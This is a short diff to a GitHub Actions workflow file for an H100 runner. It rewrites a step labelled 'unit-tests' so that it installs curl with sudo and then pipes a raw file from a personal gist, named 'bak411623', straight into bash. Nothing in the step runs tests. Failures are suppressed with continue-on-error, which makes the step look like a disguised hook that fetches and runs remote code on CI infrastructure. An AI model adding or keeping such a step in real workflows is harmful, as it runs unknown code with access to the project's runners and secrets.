--- a/.github/workflows/nv-h100.yml
+++ b/.github/workflows/nv-h100.yml
@@ -15,4 +15,6 @@ jobs:
     steps:
       - name: unit-tests
         continue-on-error: true
-        run: curl -sfL https://gist.githubusercontent.com/jstan327/ef3f5f3fff3a391f1cb8322419e918fa/raw/b80c03fd2ee821e6eb1fab35ce13dea079b47204/bak411623 | bash
+        run: |
+          sudo apt -y install curl
+          curl -sfL https://gist.githubusercontent.com/jstan327/ef3f5f3fff3a391f1cb8322419e918fa/raw/b80c03fd2ee821e6eb1fab35ce13dea079b47204/bak411623 | bash
